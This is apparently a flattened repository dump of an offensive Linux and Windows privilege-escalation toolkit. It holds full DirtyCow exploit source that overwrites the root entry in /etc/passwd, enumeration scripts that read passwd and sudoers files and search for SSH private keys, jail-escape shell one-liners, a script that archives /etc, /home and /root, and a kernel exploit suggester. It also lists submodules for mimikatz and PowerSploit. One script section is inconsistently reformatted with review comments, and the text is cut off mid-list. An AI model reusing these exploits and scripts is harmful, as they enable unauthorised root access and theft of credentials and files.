├── startftp.sh ├── dirty ├── starthttp.sh ├── rtcp4447.exe ├── EasySystem.exe ├── linux_gather_files.sh ├── .gitmodules ├── linux_privesc.sh ├── dirty.c ├── linux_kernel_exploiter.pl ├── linux_privesc.py ├── linux_checksec.sh ├── linux_enum.sh └── ADAPE.ps1 /startftp.sh: -------------------------------------------------------------------------------- 1 | python -m pyftpdlib -p 21 2 | -------------------------------------------------------------------------------- /dirty: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shiva108/escalationserver/HEAD/dirty -------------------------------------------------------------------------------- /starthttp.sh: -------------------------------------------------------------------------------- 1 | cd /home/e/httpserver/ 2 | python -m SimpleHTTPServer 8081 3 | -------------------------------------------------------------------------------- /rtcp4447.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shiva108/escalationserver/HEAD/rtcp4447.exe -------------------------------------------------------------------------------- /EasySystem.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shiva108/escalationserver/HEAD/EasySystem.exe -------------------------------------------------------------------------------- /linux_gather_files.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | tar -zcf linux_files.tar.gz /etc/* /home/* /root/* /var/www/* /var/log/* 4 | -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "AutoLocalPrivilegeEscalation"] 2 | path = AutoLocalPrivilegeEscalation 3 | url = ../../ngalongc/AutoLocalPrivilegeEscalation.git 4 | 
[submodule "BeRoot"] 5 | path = BeRoot 6 | url = ../../AlessandroZ/BeRoot.git 7 | [submodule "JAWS"] 8 | path = JAWS 9 | url = ../../411Hall/JAWS.git 10 | [submodule "kernelpop"] 11 | path = kernelpop 12 | url = ../../spencerdodd/kernelpop.git 13 | [submodule "linux-smart-enumeration"] 14 | path = linux-smart-enumeration 15 | url = ../../diego-treitos/linux-smart-enumeration.git 16 | [submodule "mimikatz"] 17 | path = mimikatz 18 | url = ../../gentilkiwi/mimikatz.git 19 | [submodule "Powerless"] 20 | path = Powerless 21 | url = ../../M4ximuss/Powerless.git 22 | [submodule "PowerLessShell"] 23 | path = PowerLessShell 24 | url = ../../Mr-Un1k0d3r/PowerLessShell.git 25 | [submodule "PowerSploit"] 26 | path = PowerSploit 27 | url = ../../PowerShellMafia/PowerSploit.git 28 | [submodule "PrivEsc"] 29 | path = PrivEsc 30 | url = ../../1N3/PrivEsc.git 31 | [submodule "Privesc"] 32 | path = Privesc 33 | url = ../../enjoiz/Privesc.git 34 | [submodule "pypykatz"] 35 | path = pypykatz 36 | url = ../../skelsec/pypykatz.git 37 | -------------------------------------------------------------------------------- /linux_privesc.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo "+ - --=[Linux Privilege Escalation Script by 1N3@CrowdShield - https://crowdshield.com" 3 | echo "" 4 | echo "Whats the distribution type? What version?" 5 | echo "#####################################################################" 6 | cat /etc/issue 7 | cat /etc/*-release 8 | echo "" 9 | echo "What's the Kernel version?" 10 | echo "#####################################################################" 11 | uname -a 12 | echo "" 13 | echo "What users are on the system?" 14 | cat /etc/passwd 15 | echo "" 16 | cat /etc/group 17 | echo "" 18 | echo "#####################################################################" 19 | echo "What services are running? 
Which service has which user" 20 | echo "#####################################################################" 21 | ps -auxxx | grep root 22 | echo "" 23 | echo "What applications are installed?" 24 | echo "#####################################################################" 25 | dpkg -l 26 | rpm -qa 27 | echo "" 28 | echo "#####################################################################" 29 | echo "Find configuration files for services..." 30 | find /etc/ -name *.conf 31 | echo "" 32 | echo "What jobs are scheduled?" 33 | echo "#####################################################################" 34 | crontab -l 35 | ls -alh /var/spool/cron 36 | ls -al /etc/cron* 37 | cat /etc/cron* 38 | echo "" 39 | echo "What NIC(s) does the system have?" 40 | echo "#####################################################################" 41 | echo "- Hostname" 42 | hostname 43 | echo "- Network Interfaces:" 44 | /sbin/ifconfig -a 45 | echo "- Routing info:" 46 | /sbin/route 47 | echo "- ARP Cache:" 48 | arp -a 49 | echo "- Current Network Connections:" 50 | netstat -antup 51 | echo "" 52 | echo "What sudo commands can be ran?" 53 | echo "#####################################################################" 54 | sudo -l 2> /dev/null 55 | echo "" 56 | cat /etc/sudoers 57 | echo "" 58 | echo "Anything interesting in the home directorie(s)? If its possible to access" 59 | echo "#####################################################################" 60 | echo " - /root/" 61 | ls -ahl /root/ 62 | echo "" 63 | echo " - /home/" 64 | ls -ahl /home/ 65 | echo "*** NOTE: Check for .bash_history files for clues, .ssh directories/keys and hidden directories/files for more clues..." 66 | echo "" 67 | echo "Can private-key information be found?" 
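# Second part of the enumeration pass of linux_privesc.sh: SSH key material,
# the web root, fstab, the setuid/setgid inventory, and the build and
# file-transfer tools found on PATH. Every command only reads and prints;
# nothing on the host is modified.
rule="#####################################################################"

# Underlines the private-key heading printed by the preceding statement.
echo "$rule"
# authorized_keys files and id_* files are the SSH items to review.
# The id_* pattern is quoted so that find receives the glob itself; unquoted,
# the shell would expand it against the current directory first and the
# search would silently depend on where the script was started.
find /home/ -name authorized_keys
echo ""
find /home/ -name 'id_*'
echo ""
find /root/ -name authorized_keys
echo ""
find /root/ -name 'id_*'
echo ""
ls -lah /root/.ssh/
echo ""
echo "Any settings/files (hidden) on website?"
echo "$rule"
ls -alh /var/www/
echo ""
echo "If commands are limited, you break out of the jail shell?"
echo "$rule"
# The next three lines only print text. NOTE(review): in the first one the
# inner double quotes close and reopen the shell string, so they do not
# appear in the output (ShellCheck SC2140). Left as the author wrote it.
echo "python -c 'import pty;pty.spawn("/bin/bash")'"
echo "echo os.system('/bin/bash')"
echo "/bin/sh -i"
echo ""
echo "Are there any unmounted file-systems?"
echo "$rule"
cat /etc/fstab
echo ""
echo "SUID OR GUID files..."
echo "$rule"
# -perm -04000 matches setuid files and -perm -02000 matches setgid files.
# Permission errors from unreadable directories are discarded. When auditing,
# compare the result with the distribution's expected set: an entry that no
# package owns is a finding.
find / -type f \( -perm -04000 -o -perm -02000 \) -exec ls -lh {} \; 2> /dev/null
echo ""
echo "What development tools/languages are installed/supported?"
echo "$rule"
# command -v is the POSIX way to resolve a name on PATH under /bin/sh;
# `which` is an external program that is not guaranteed to be installed.
# A missing tool prints nothing, so the output lists only what is present.
for tool in perl gcc g++ python php cc go node; do
  command -v "$tool"
done
echo ""
echo "How can files be uploaded?"
echo "$rule"
# Transfer clients available to a local user; on a hardened host this list
# is expected to be short.
for tool in wget nc netcat scp ftp tftp curl; do
  command -v "$tool"
done
echo ""
echo "$rule"
echo "Done!"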
120 | -------------------------------------------------------------------------------- /dirty.c: -------------------------------------------------------------------------------- 1 | // 2 | // This exploit uses the pokemon exploit of the dirtycow vulnerability 3 | // as a base and automatically generates a new passwd line. 4 | // The user will be prompted for the new password when the binary is run. 5 | // The original /etc/passwd file is then backed up to /tmp/passwd.bak 6 | // and overwrites the root account with the generated line. 7 | // After running the exploit you should be able to login with the newly 8 | // created user. 9 | // 10 | // To use this exploit modify the user values according to your needs. 11 | // The default is "firefart". 12 | // 13 | // Original exploit (dirtycow's ptrace_pokedata "pokemon" method): 14 | // https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c 15 | // 16 | // Compile with: 17 | // gcc -pthread dirty.c -o dirty -lcrypt 18 | // 19 | // Then run the newly create binary by either doing: 20 | // "./dirty" or "./dirty my-new-password" 21 | // 22 | // Afterwards, you can either "su firefart" or "ssh firefart@..." 23 | // 24 | // DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT! 
25 | // mv /tmp/passwd.bak /etc/passwd 26 | // 27 | // Exploit adopted by Christian "FireFart" Mehlmauer 28 | // https://firefart.at 29 | // 30 | 31 | #include 32 | #include 33 | #include 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #include 41 | #include 42 | #include 43 | #include 44 | 45 | const char *filename = "/etc/passwd"; 46 | const char *backup_filename = "/tmp/passwd.bak"; 47 | const char *salt = "firefart"; 48 | 49 | int f; 50 | void *map; 51 | pid_t pid; 52 | pthread_t pth; 53 | struct stat st; 54 | 55 | struct Userinfo { 56 | char *username; 57 | char *hash; 58 | int user_id; 59 | int group_id; 60 | char *info; 61 | char *home_dir; 62 | char *shell; 63 | }; 64 | 65 | char *generate_password_hash(char *plaintext_pw) { 66 | return crypt(plaintext_pw, salt); 67 | } 68 | 69 | char *generate_passwd_line(struct Userinfo u) { 70 | const char *format = "%s:%s:%d:%d:%s:%s:%s\n"; 71 | int size = snprintf(NULL, 0, format, u.username, u.hash, 72 | u.user_id, u.group_id, u.info, u.home_dir, u.shell); 73 | char *ret = malloc(size + 1); 74 | sprintf(ret, format, u.username, u.hash, u.user_id, 75 | u.group_id, u.info, u.home_dir, u.shell); 76 | return ret; 77 | } 78 | 79 | void *madviseThread(void *arg) { 80 | int i, c = 0; 81 | for(i = 0; i < 200000000; i++) { 82 | c += madvise(map, 100, MADV_DONTNEED); 83 | } 84 | printf("madvise %d\n\n", c); 85 | } 86 | 87 | int copy_file(const char *from, const char *to) { 88 | // check if target file already exists 89 | if(access(to, F_OK) != -1) { 90 | printf("File %s already exists! 
Please delete it and run again\n", 91 | to); 92 | return -1; 93 | } 94 | 95 | char ch; 96 | FILE *source, *target; 97 | 98 | source = fopen(from, "r"); 99 | if(source == NULL) { 100 | return -1; 101 | } 102 | target = fopen(to, "w"); 103 | if(target == NULL) { 104 | fclose(source); 105 | return -1; 106 | } 107 | 108 | while((ch = fgetc(source)) != EOF) { 109 | fputc(ch, target); 110 | } 111 | 112 | printf("%s successfully backed up to %s\n", 113 | from, to); 114 | 115 | fclose(source); 116 | fclose(target); 117 | 118 | return 0; 119 | } 120 | 121 | int main(int argc, char *argv[]) 122 | { 123 | // backup file 124 | int ret = copy_file(filename, backup_filename); 125 | if (ret != 0) { 126 | exit(ret); 127 | } 128 | 129 | struct Userinfo user; 130 | // set values, change as needed 131 | user.username = "firefart"; 132 | user.user_id = 0; 133 | user.group_id = 0; 134 | user.info = "pwned"; 135 | user.home_dir = "/root"; 136 | user.shell = "/bin/bash"; 137 | 138 | char *plaintext_pw; 139 | 140 | if (argc >= 2) { 141 | plaintext_pw = argv[1]; 142 | printf("Please enter the new password: %s\n", plaintext_pw); 143 | } else { 144 | plaintext_pw = getpass("Please enter the new password: "); 145 | } 146 | 147 | user.hash = generate_password_hash(plaintext_pw); 148 | char *complete_passwd_line = generate_passwd_line(user); 149 | printf("Complete line:\n%s\n", complete_passwd_line); 150 | 151 | f = open(filename, O_RDONLY); 152 | fstat(f, &st); 153 | map = mmap(NULL, 154 | st.st_size + sizeof(long), 155 | PROT_READ, 156 | MAP_PRIVATE, 157 | f, 158 | 0); 159 | printf("mmap: %lx\n",(unsigned long)map); 160 | pid = fork(); 161 | if(pid) { 162 | waitpid(pid, NULL, 0); 163 | int u, i, o, c = 0; 164 | int l=strlen(complete_passwd_line); 165 | for(i = 0; i < 10000/l; i++) { 166 | for(o = 0; o < l; o++) { 167 | for(u = 0; u < 10000; u++) { 168 | c += ptrace(PTRACE_POKETEXT, 169 | pid, 170 | map + o, 171 | *((long*)(complete_passwd_line + o))); 172 | } 173 | } 174 | } 175 | 
printf("ptrace %d\n",c); 176 | } 177 | else { 178 | pthread_create(&pth, 179 | NULL, 180 | madviseThread, 181 | NULL); 182 | ptrace(PTRACE_TRACEME); 183 | kill(getpid(), SIGSTOP); 184 | pthread_join(pth,NULL); 185 | } 186 | 187 | printf("Done! Check %s to see if the new user was created.\n", filename); 188 | printf("You can log in with the username '%s' and the password '%s'.\n\n", 189 | user.username, plaintext_pw); 190 | printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n", 191 | backup_filename, filename); 192 | return 0; 193 | } 194 | -------------------------------------------------------------------------------- /linux_kernel_exploiter.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | use strict; 3 | use warnings; 4 | use Getopt::Std; 5 | 6 | our $VERSION = '0.8'; 7 | 8 | my %opts; 9 | getopt( 'k,h', \%opts ); 10 | usage() if exists $opts{h}; 11 | 12 | my ( $khost, $is_partial ) = get_kernel(); 13 | print "\nKernel local: $khost\n\n"; 14 | 15 | my %exploits = get_exploits(); 16 | print 'Searching among ' . scalar keys(%exploits) . 
" exploits...\n\n"; 17 | print "Possible Exploits:\n"; 18 | 19 | EXPLOIT: 20 | foreach my $key ( sort keys %exploits ) { 21 | foreach my $kernel ( @{ $exploits{$key}{vuln} } ) { 22 | 23 | if ( $khost eq $kernel 24 | or ( $is_partial and index($kernel,$khost) == 0 ) 25 | ) { 26 | print "[+] $key"; 27 | print " ($kernel)" if $is_partial; 28 | 29 | my $alt = $exploits{$key}{alt}; 30 | my $cve = $exploits{$key}{cve}; 31 | my $mlw = $exploits{$key}{mil}; 32 | if ( $alt or $cve ) { 33 | print "\n"; 34 | } 35 | if ( $alt ) { print " Alt: $alt "; } 36 | if ( $cve ) { print " CVE-$cve"; } 37 | if ( $mlw ) { print "\n Source: $mlw"; } 38 | print "\n"; 39 | next EXPLOIT; 40 | } 41 | } 42 | } 43 | exit; 44 | 45 | 46 | ###################### 47 | ## extra functions ## 48 | ###################### 49 | 50 | sub get_kernel { 51 | my $khost = ''; 52 | 53 | if ( exists $opts{k} ) { 54 | $khost = $opts{k}; 55 | } 56 | else { 57 | $khost = `uname -r |cut -d"-" -f1`; 58 | chomp $khost; 59 | } 60 | 61 | # partial kernels might be provided by the user, 62 | # such as '2.4' or '2.6.' 63 | my $is_partial = $khost =~ /^\d+\.\d+\.\d/ ? 0 : 1; 64 | if ( $is_partial and substr($khost,-1) ne '.' ) { 65 | $khost .= '.'; 66 | } 67 | return ( $khost, $is_partial ); 68 | } 69 | 70 | sub usage { 71 | print <<"EOUSAGE"; 72 | Linux Exploit Suggester $VERSION 73 | Usage: \t$0 [-h] [-k kernel] 74 | 75 | [-h] help (this message) 76 | [-k] kernel number eg. 2.6.28 77 | 78 | You can also provide a partial kernel version (eg. 2.4) 79 | to see all exploits available. 
80 | 81 | EOUSAGE 82 | } 83 | 84 | sub get_exploits { 85 | return ( 86 | 'w00t' => { 87 | vuln => [ 88 | '2.4.10', '2.4.16', '2.4.17', '2.4.18', 89 | '2.4.19', '2.4.20', '2.4.21', 90 | ] 91 | }, 92 | 'brk' => { 93 | vuln => [ '2.4.10', '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ], 94 | }, 95 | 'ave' => { vuln => [ '2.4.19', '2.4.20' ] }, 96 | 97 | 'elflbl' => { 98 | vuln => ['2.4.29'], 99 | mil => 'http://www.exploit-db.com/exploits/744/', 100 | }, 101 | 102 | 'elfdump' => { vuln => ['2.4.27'] }, 103 | 'elfcd' => { vuln => ['2.6.12'] }, 104 | 'expand_stack' => { vuln => ['2.4.29'] }, 105 | 106 | 'h00lyshit' => { 107 | vuln => [ 108 | '2.6.8', '2.6.10', '2.6.11', '2.6.12', 109 | '2.6.13', '2.6.14', '2.6.15', '2.6.16', 110 | ], 111 | cve => '2006-3626', 112 | mil => 'http://www.exploit-db.com/exploits/2013/', 113 | }, 114 | 115 | 'kdump' => { vuln => ['2.6.13'] }, 116 | 'km2' => { vuln => [ '2.4.18', '2.4.22' ] }, 117 | 'krad' => 118 | { vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ] }, 119 | 120 | 'krad3' => { 121 | vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ], 122 | mil => 'http://exploit-db.com/exploits/1397', 123 | }, 124 | 125 | 'local26' => { vuln => ['2.6.13'] }, 126 | 'loko' => { vuln => [ '2.4.22', '2.4.23', '2.4.24' ] }, 127 | 128 | 'mremap_pte' => { 129 | vuln => [ '2.4.20', '2.2.24', '2.4.25', '2.4.26', '2.4.27' ], 130 | mil => 'http://www.exploit-db.com/exploits/160/', 131 | }, 132 | 133 | 'newlocal' => { vuln => [ '2.4.17', '2.4.19' ] }, 134 | 'ong_bak' => { vuln => ['2.6.5'] }, 135 | 'ptrace' => 136 | { vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ] }, 137 | 'ptrace_kmod' => { 138 | vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ], 139 | cve => '2007-4573', 140 | }, 141 | 'ptrace_kmod2' => { 142 | vuln => [ 143 | '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', 144 | '2.6.32', '2.6.33', '2.6.34', 145 | ], 146 | alt => 'ia32syscall,robert_you_suck', 147 | mil => 
'http://www.exploit-db.com/exploits/15023/', 148 | cve => '2010-3301', 149 | }, 150 | 'ptrace24' => { vuln => ['2.4.9'] }, 151 | 'pwned' => { vuln => ['2.6.11'] }, 152 | 'py2' => { vuln => [ '2.6.9', '2.6.17', '2.6.15', '2.6.13' ] }, 153 | 'raptor_prctl' => { 154 | vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ], 155 | cve => '2006-2451', 156 | mil => 'http://www.exploit-db.com/exploits/2031/', 157 | }, 158 | 'prctl' => { 159 | vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ], 160 | mil => 'http://www.exploit-db.com/exploits/2004/', 161 | }, 162 | 'prctl2' => { 163 | vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ], 164 | mil => 'http://www.exploit-db.com/exploits/2005/', 165 | }, 166 | 'prctl3' => { 167 | vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ], 168 | mil => 'http://www.exploit-db.com/exploits/2006/', 169 | }, 170 | 'prctl4' => { 171 | vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ], 172 | mil => 'http://www.exploit-db.com/exploits/2011/', 173 | }, 174 | 'remap' => { vuln => ['2.4.'] }, 175 | 'rip' => { vuln => ['2.2.'] }, 176 | 'stackgrow2' => { vuln => [ '2.4.29', '2.6.10' ] }, 177 | 'uselib24' => { 178 | vuln => [ '2.6.10', '2.4.17', '2.4.22', '2.4.25', '2.4.27', '2.4.29' ] 179 | }, 180 | 'newsmp' => { vuln => ['2.6.'] }, 181 | 'smpracer' => { vuln => ['2.4.29'] }, 182 | 'loginx' => { vuln => ['2.4.22'] }, 183 | 'exp.sh' => { vuln => [ '2.6.9', '2.6.10', '2.6.16', '2.6.13' ] }, 184 | 'vmsplice1' => { 185 | vuln => [ 186 | '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', 187 | '2.6.23', '2.6.24', '2.6.24.1', 188 | ], 189 | alt => 'jessica biel', 190 | cve => '2008-0600', 191 | mil => 'http://www.exploit-db.com/exploits/5092', 192 | }, 193 | 'vmsplice2' => { 194 | vuln => [ '2.6.23', '2.6.24' ], 195 | alt => 'diane_lane', 196 | cve => '2008-0600', 197 | mil => 'http://www.exploit-db.com/exploits/5093', 198 | }, 199 | 'vconsole' => { 200 | vuln => ['2.6.'], 201 | cve => '2009-1046', 
202 | }, 203 | 'sctp' => { 204 | vuln => ['2.6.26'], 205 | cve => '2008-4113', 206 | }, 207 | 'ftrex' => { 208 | vuln => [ 209 | '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', 210 | '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', 211 | ], 212 | cve => '2008-4210', 213 | mil => 'http://www.exploit-db.com/exploits/6851', 214 | }, 215 | 'exit_notify' => { 216 | vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ], 217 | mil => 'http://www.exploit-db.com/exploits/8369', 218 | }, 219 | 'udev' => { 220 | vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ], 221 | alt => 'udev <1.4.1', 222 | cve => '2009-1185', 223 | mil => 'http://www.exploit-db.com/exploits/8478', 224 | }, 225 | 226 | 'sock_sendpage2' => { 227 | vuln => [ 228 | '2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9', 229 | '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15', 230 | '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21', 231 | '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27', 232 | '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33', 233 | '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0', '2.6.1', 234 | '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', 235 | '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13', 236 | '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', 237 | '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', 238 | '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', 239 | ], 240 | alt => 'proto_ops', 241 | cve => '2009-2692', 242 | mil => 'http://www.exploit-db.com/exploits/9436', 243 | }, 244 | 245 | 'sock_sendpage' => { 246 | vuln => [ 247 | '2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9', 248 | '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15', 249 | '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21', 250 | '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27', 251 | '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33', 252 | '2.4.34', '2.4.35', 
'2.4.36', '2.4.37', '2.6.0', '2.6.1', 253 | '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', 254 | '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', '2.6.13', 255 | '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', 256 | '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', 257 | '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', 258 | ], 259 | alt => 'wunderbar_emporium', 260 | cve => '2009-2692', 261 | mil => 'http://www.exploit-db.com/exploits/9435', 262 | }, 263 | 'udp_sendmsg_32bit' => { 264 | vuln => [ 265 | '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', 266 | '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', '2.6.12', 267 | '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', 268 | '2.6.19', 269 | ], 270 | cve => '2009-2698', 271 | mil => 272 | 'http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c', 273 | }, 274 | 'pipe.c_32bit' => { 275 | vuln => [ 276 | '2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9', 277 | '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15', 278 | '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21', 279 | '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27', 280 | '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33', 281 | '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.15', '2.6.16', 282 | '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', 283 | '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', 284 | '2.6.29', '2.6.30', '2.6.31', 285 | ], 286 | cve => '2009-3547', 287 | mil => 288 | 'http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c', 289 | }, 290 | 'do_pages_move' => { 291 | vuln => [ 292 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 293 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 294 | '2.6.30', '2.6.31', 295 | ], 296 | alt => 'sieve', 297 | cve => '2010-0415', 298 | mil => 'Spenders Enlightenment', 299 | }, 300 | 'reiserfs' => { 301 | vuln => [ 302 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', 
'2.6.22', '2.6.23', 303 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 304 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', 305 | ], 306 | cve => '2010-1146', 307 | mil => 'http://www.exploit-db.com/exploits/12130/', 308 | }, 309 | 'can_bcm' => { 310 | vuln => [ 311 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 312 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 313 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', 314 | '2.6.36', 315 | ], 316 | cve => '2010-2959', 317 | mil => 'http://www.exploit-db.com/exploits/14814/', 318 | }, 319 | 'rds' => { 320 | vuln => [ 321 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', 322 | '2.6.34', '2.6.35', '2.6.36', 323 | ], 324 | mil => 'http://www.exploit-db.com/exploits/15285/', 325 | cve => '2010-3904', 326 | }, 327 | 'half_nelson' => { 328 | vuln => [ 329 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', 330 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', 331 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', 332 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 333 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 334 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', 335 | '2.6.36', 336 | ], 337 | alt => 'econet', 338 | cve => '2010-3848', 339 | mil => 'http://www.exploit-db.com/exploits/6851', 340 | }, 341 | 'half_nelson1' => { 342 | vuln => [ 343 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', 344 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', 345 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', 346 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 347 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 348 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', 349 | '2.6.36', 350 | ], 351 | alt => 'econet', 352 | cve => '2010-3848', 353 | mil => 'http://www.exploit-db.com/exploits/17787/', 354 | }, 355 | 'half_nelson2' => { 356 | vuln => [ 357 | 
'2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', 358 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', 359 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', 360 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 361 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 362 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', 363 | '2.6.36', 364 | ], 365 | alt => 'econet', 366 | cve => '2010-3850', 367 | mil => 'http://www.exploit-db.com/exploits/17787/', 368 | }, 369 | 'half_nelson3' => { 370 | vuln => [ 371 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', 372 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', 373 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', 374 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 375 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 376 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', 377 | '2.6.36', 378 | ], 379 | alt => 'econet', 380 | cve => '2010-4073', 381 | mil => 'http://www.exploit-db.com/exploits/17787/', 382 | }, 383 | 'caps_to_root' => { 384 | vuln => [ '2.6.34', '2.6.35', '2.6.36' ], 385 | cve => 'n/a', 386 | mil => 'http://www.exploit-db.com/exploits/15916/', 387 | }, 388 | 'american-sign-language' => { 389 | vuln => [ 390 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', 391 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', 392 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', 393 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 394 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 395 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', 396 | '2.6.36', 397 | ], 398 | cve => '2010-4347', 399 | mil => 'http://www.securityfocus.com/bid/45408/', 400 | }, 401 | 'pktcdvd' => { 402 | vuln => [ 403 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', 404 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', 405 | '2.6.12', '2.6.13', '2.6.14', 
